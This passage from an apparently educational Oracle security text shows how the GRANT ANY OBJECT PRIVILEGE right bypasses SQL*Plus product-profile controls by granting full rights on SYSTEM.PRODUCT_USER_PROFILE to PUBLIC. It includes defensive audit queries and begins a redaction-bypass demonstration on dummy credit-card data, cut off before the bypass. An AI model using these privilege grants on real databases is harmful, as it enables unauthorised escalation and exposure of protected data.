ERROR at line 1:
ORA-01749: you may not GRANT/REVOKE privileges to/from yourself
SQL> grant all on system.PRODUCT_USER_PROFILE to gaoprole, public;
Grant succeeded.
The preceding output shows that GAOP can be used to bypass the PUP security controls. The PUP is already well
explained in SQL*Plus Reference by Jonathan Gennick.
http://oreilly.com/catalog/orsqplus/chapter/ch09.html
The GAOP privilege effectively gives the holder full DBA access. It can therefore be added to the list of system privileges,
such as CREATE ANY DIRECTORY, that effectively enable SYSDBA. Let's look at redaction next.
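An audit a defender could run for the exposure described above. This is an added example, not from the original text, and it assumes an account that can read the DBA_* dictionary views. It lists who holds the privileges named here and who can touch the PUP table.

```sql
-- Added audit example (not from the original text).
-- Assumes the session can query DBA_SYS_PRIVS, DBA_ROLE_PRIVS,
-- DBA_TAB_PRIVS and DBA_USERS.

-- 1. Direct holders of the system privileges the text treats as
--    DBA-equivalent.
SELECT grantee, privilege, admin_option
FROM   dba_sys_privs
WHERE  privilege IN ('GRANT ANY OBJECT PRIVILEGE', 'CREATE ANY DIRECTORY')
ORDER  BY privilege, grantee;

-- 2. Users who inherit GRANT ANY OBJECT PRIVILEGE through a chain of
--    roles. The walk starts at every role holding the privilege and
--    follows role grants outward to the accounts at the end of the chain.
SELECT DISTINCT grantee
FROM   dba_role_privs
WHERE  grantee IN (SELECT username FROM dba_users)
START  WITH granted_role IN (SELECT grantee
                             FROM   dba_sys_privs
                             WHERE  privilege = 'GRANT ANY OBJECT PRIVILEGE')
CONNECT BY PRIOR grantee = granted_role
ORDER  BY grantee;

-- 3. Every object privilege on the PUP table. After the GRANT ALL shown
--    above, GAOPROLE and PUBLIC would both appear here with write access.
SELECT grantee, privilege, grantor, grantable
FROM   dba_tab_privs
WHERE  owner = 'SYSTEM'
AND    table_name = 'PRODUCT_USER_PROFILE'
ORDER  BY grantee, privilege;
```

Any grantee in the third result holding INSERT, UPDATE or DELETE can rewrite the PUP restrictions, so that list is the one to review first.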
Redaction Bypasses
It is possible to bypass redaction controls by using error messages, as shown in the example below, kindly provided by
Alex Kornbrust and tested by myself.
C:\Windows\System32>sqlplus sys/o@192.168.56.101/orcl as sysdba
SQL*Plus: Release 12.1.0.1.0 Production on Mon Feb 10 11:35:13 2014
Copyright (c) 1982, 2013, Oracle. All rights reserved.
Connected to:
Oracle Database 12c Enterprise Edition Release 12.1.0.1.0 - 64bit Production
With the Partitioning, OLAP, Advanced Analytics and Real Application Testing options
SQL> grant connect,resource to scott identified by scott;
Grant succeeded.
SQL> CREATE TABLE scott.credit_card(cust_name VARCHAR2(64), card_id VARCHAR2(64));
Table created.
SQL> INSERT INTO scott.credit_card VALUES ('Marco','1234-1234-1234-1234');
1 row created.
SQL> INSERT INTO scott.credit_card VALUES ('Hans','5678-5678-5678-5678');
1 row created.
SQL> commit;
Commit complete.
 